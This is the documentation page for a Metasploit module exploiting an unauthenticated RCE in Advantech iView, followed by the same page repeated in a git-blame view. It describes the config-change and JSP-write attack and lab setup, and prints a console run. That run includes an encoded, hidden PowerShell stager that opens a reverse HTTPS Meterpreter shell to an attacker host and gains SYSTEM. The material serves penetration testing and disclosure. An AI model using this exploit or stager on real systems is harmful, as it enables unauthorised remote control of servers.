documentation/modules/exploit/windows/http/advantech_iview_unauth_rce.md

## Vulnerable Application
This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive,
leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically
NT AUTHORITY\SYSTEM.

The exploit functions by first modifying a configuration value to be a writable path in the webroot. An export function
is then leveraged to write JSP content into the previously configured which can then be requested to trigger the
execution of an OS command within the context of the application. Once completed, the original configuration value is
restored.

### Setup (Windows)

1. Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.
    * The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring
      each of them.
1. Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is
  because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:
    1. Copy the `msvcr100.dll` file from `C:\Program Files (x86)\Java\jre7\bin` to `C:\Program Files (x86)\iView\Apache
      Software Foundation\Tomcat6.0\bin`.
    1. Restart the "Apache Tomcat 6" service.
1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.

## Verification Steps

1. Install the application (see the "Setup" section)
1. Start msfconsole
1. Do: `use exploit/windows/http/advantech_iview_unauth_rce`
1. Set the `RHOST` and `PAYLOAD` options as applicable
1. Do: `run`
1. You should get a shell.

## Scenarios
### Windows 10 v1909 x64 running Advantech iView 5.7.0002.5992

```
msf6 exploit(windows/http/advantech_iview_unauth_rce) > set RHOSTS 192.168.159.30
RHOSTS => 192.168.159.30
msf6 exploit(windows/http/advantech_iview_unauth_rce) > check
[*] 192.168.159.30:8080 - The target appears to be vulnerable.
msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Retrieving config
[+] Successfully retrieved config
[*] Updating config
[+] Successfully updated config
[*] Writing JSP stub
[+] Successfully wrote JSP stub
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Executing command: cmd.exe /c powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] Restoring config
[+] Successfully restored config
[*] https://192.168.159.128:8443 handling request from 192.168.159.30; (UUID: romk3zgq) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400
[!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target

meterpreter >
[+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-RTCRBEV
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00			`## Vulnerable Application`
			`This module exploits an unauthenticated configuration change combined with an unauthenticated file write primitive,`
			`leading to an arbitrary file write that allows for remote code execution as the user running iView, which is typically`
			`NT AUTHORITY\SYSTEM.`

Fix typos 2021-03-22 14:15:49 -05:00			`The exploit functions by first modifying a configuration value to be a writable path in the webroot. An export function`
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00			`is then leveraged to write JSP content into the previously configured which can then be requested to trigger the`
			`execution of an OS command within the context of the application. Once completed, the original configuration value is`
			`restored.`

			`### Setup (Windows)`

			`1. Follow each of the steps from the iView Installation Instructions guide that is distributed with the application.`
Fix typos 2021-03-22 14:15:49 -05:00			`* The installer contains the necessary dependencies. This guide will outlines the steps necessary for configuring`
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00			`each of them.`
			`1. Once the installation is complete, the "Installation Verification" step (Step 6) will most likely fail. This is`
			`because the "Apache Tomcat 6" service is not running. Attempting to start it will fail. To correct this issue:`
			1. Copy the `msvcr100.dll` file from `C:\Program Files (x86)\Java\jre7\bin` to `C:\Program Files (x86)\iView\Apache
			Software Foundation\Tomcat6.0\bin`.
			`1. Restart the "Apache Tomcat 6" service.`
Fix typos 2021-03-22 14:15:49 -05:00			`1 At this point, the application should be listening on port 8080 and no additional configuration is necessary.`
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00
			`## Verification Steps`

			`1. Install the application (see the "Setup" section)`
			`1. Start msfconsole`
			1. Do: `use exploit/windows/http/advantech_iview_unauth_rce`
			1. Set the `RHOST` and `PAYLOAD` options as applicable
			1. Do: `run`
			`1. You should get a shell.`

			`## Scenarios`
			`### Windows 10 v1909 x64 running Advantech iView 5.7.0002.5992`

			```
			`msf6 exploit(windows/http/advantech_iview_unauth_rce) > set RHOSTS 192.168.159.30`
			`RHOSTS => 192.168.159.30`
			`msf6 exploit(windows/http/advantech_iview_unauth_rce) > check`
			`[*] 192.168.159.30:8080 - The target appears to be vulnerable.`
			`msf6 exploit(windows/http/advantech_iview_unauth_rce) > exploit`

			`[*] Started HTTPS reverse handler on https://192.168.159.128:8443`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable.`
			`[*] Retrieving config`
			`[+] Successfully retrieved config`
			`[*] Updating config`
			`[+] Successfully updated config`
			`[*] Writing JSP stub`
			`[+] Successfully wrote JSP stub`
			`[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https`
			[*] Executing command: cmd.exe /c powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
			`[+] Successfully executed command`
			`[*] Restoring config`
			`[+] Successfully restored config`
			`[*] https://192.168.159.128:8443 handling request from 192.168.159.30; (UUID: romk3zgq) Staging x64 payload (201308 bytes) ...`
			`[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.30:62405) at 2021-03-22 15:01:57 -0400`
			`[!] This exploit may require manual cleanup of 'webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp' on the target`

Fix typos 2021-03-22 14:15:49 -05:00			`meterpreter >`
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00			`[+] Deleted webapps\iView3\SpmIkVwVxCmze0kQ8PhSUVHXRrRNLa.jsp`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > sysinfo`
			`Computer : DESKTOP-RTCRBEV`
			`OS : Windows 10 (10.0 Build 18363).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 2`
			`Meterpreter : x64/windows`
Fix typos 2021-03-22 14:15:49 -05:00			`meterpreter >`
Use POST for the check method and write the module docs 2021-03-22 15:04:21 -04:00			```